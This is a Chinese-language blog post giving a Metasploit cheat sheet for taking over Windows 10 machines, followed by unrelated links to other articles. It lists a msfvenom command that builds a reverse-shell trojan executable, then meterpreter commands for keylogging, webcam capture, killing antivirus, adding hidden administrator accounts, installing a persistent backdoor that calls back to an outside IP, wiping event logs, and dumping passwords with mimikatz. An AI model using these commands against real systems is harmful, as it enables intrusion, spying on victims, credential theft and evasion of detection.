msf 常用命令

                         可渗透win10
msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip  LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe          生成木马
msfconsole
use exploit/multi/handler      利用模块
show targets                查看这个模块适用于哪些机型
set payload windows/meterpreter/reverse_tcp     使用该模块
show options               #查看还需要设置什么
set lhost 本机ip             #设置本机ip
exploit                   #攻击
screenshot             #屏幕截图
screenshare                #实时观看
shell                    #打开目标cmd
keyscan_start               #开启键盘监听
keyscan_dump            #查看监听记录
keyscan_stop            #停止监听
uictl disable keyboard/mouse     #禁用键盘/鼠标
uictl enable keyboard/mouse     #启用键盘/鼠标制权
getsystem                 #提权
upload a.exe  c:/         #上传文件到c:/
download c:\\a.exe /root/      #下载文件到root目录
ps                      #查看进程
kill 2312             #关闭pid为2312的进程
webcam_list            #列举摄像头
webcam_snap            #通过远程连接目标系统的摄像头
run killav                #关闭对方的杀软
run getgui -e -u Venus -p 123456   #启动rdp新建用户
net user admin 123456 /add     #新建一个用户名admin 密码123456的用户
net user admin$ 123456 /add    # 创建一个隐藏用户
net localgroug administrators admin /add    #加入管理员权限
run persistence -X -i 5 -p 8888 -r 192.168.1.11  #生成一个持续性后门
clearev                 #删除日志文件
cmd 里输入systeminfo命令           #可以查看打了哪些补丁等等
explorer.exe ::{645FF040-5081-101B-9F08-00AA002F954E}   #打开回收站
dir c:\ d:\ e:\ /s /b | find "password.txt"        # 全盘搜索文件

拿密码

进去meterpreter后getuid一下(其实这个也没多大用处,进入meterpreter模式下 大部分情况下是拥有system权限,无需get system,但可能有些权限管理员的不一样)
1.getuid                获取系统管理员权限
2.load mimikatz           mimikatz模块
3.msv                          获取登入密码的hash值
4.kerberos           获取明文密码拿到登入的明文密码了不过也有一些特殊的情况,例如这样kerberos   不显示哈希值使用另一种方式获取哈希值mimikatz_command -f samdump::hashes跟具上面的方法获取明文密码1. mimikatz_command -f sekurlsa::searchPasswords2. mimikatz_command -f sekurlsa::searchPasswords更简洁的方法,就是wdigest命令了,这个命令呢,没有上面的复杂,加载模块后直接调用这个wdigest还有一个wdigest一样牛的就是tspkg

msf渗透命令和后渗透攻击相关推荐

  1. 渗透测试-[Meterpreter后渗透25招]

    渗透测试-[后渗透25招] 0.实验环境 1.MS08-067漏洞描述[RPC] 2.主机发现 3 利用MSF通过ms08-067漏洞渗透目标系统 4.后渗透利用 4.1.系统信息搜集 (1)获取系统 ...

  2. 内网渗透之某后渗透利用【网络安全】

    0x01 工具介绍 工具原理 Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程 ...

  3. 内网渗透-Metasploit之——基本后渗透命令

    Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...

  4. [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  5. [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  6. MSF(六):后渗透

    后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...

  7. 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令

    环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...

  8. 如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)

    如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料 ...

  9. MSF后渗透模块Meterpreter

    目录 后门 persistence metsvc 图形界面 getgui 信息收集 判断目标是不是虚拟机 arp主机发现 nmap主机发现 dumplink-最近访问的文件记录 enum_applic ...

最新文章

  1. 基于OpenPose的人体姿态检测两个群众
  2. 【Thinkphp 5】 整合邮箱类 phpmailer实现邮件发送
  3. c#下实现GUI编程_程序员会懂的冷笑话:各大编程语言的内心独白
  4. 迷宫寻宝(一) ---- 状态压缩
  5. 【BZOJ1452】[JSOI2009]Count(树状数组)
  6. fate服务器维护,活动维护公告(2020年4月1日 14时)
  7. 调用WindowsAPI显示帮助提示
  8. unityios开发--加载视频以及加载完成之后自动跳转 .
  9. 保护导师,从我做起;爱护博导,人人有责
  10. 《企业大数据系统构建实战:技术、架构、实施与应用》——第1章 企业大数据战略定位 1.1 宏观...
  11. g++ -std=c++_在C ++ std库中使用sort()
  12. sql2000下 分页存储过程(一)
  13. Pycharm设置快捷键放大缩小字体
  14. 现今活跃在信息技术领域的卓越作者--张亚飞新作上市
  15. Kernel: printk: pr_debug:动态日志打印功能
  16. python取值范围到无穷大_python的特殊数字类型(无穷大、无穷小等)
  17. Python守护进程命令,再也不怕被整蛊了!
  18. 03 为什么 React 16 要更改组件的生命周期?(下)
  19. scrapy遇上ajax,抓取QQ音乐周杰伦专辑与歌词(6)
  20. Godaddy申请退款

热门文章

  1. Brain Stimulation: ​大脑电生理记录和刺激工具包(BEST)
  2. ATECC608A的完美兼容国产替代芯片
  3. 使用veil进行木马生成
  4. kindle的下载电子书的资源网站
  5. ChibiOS如何建立自己的板级(board)配置
  6. 为什么不是 GitBook 而是 GitChat?
  7. 【图的存储】邻接多重表
  8. ue4材质节点怎么用_自学ue4材质,一大堆材质节点该如何学?
  9. UCOSIII任务调度和任务切换
  10. R语言进行多重样本t检验代码问题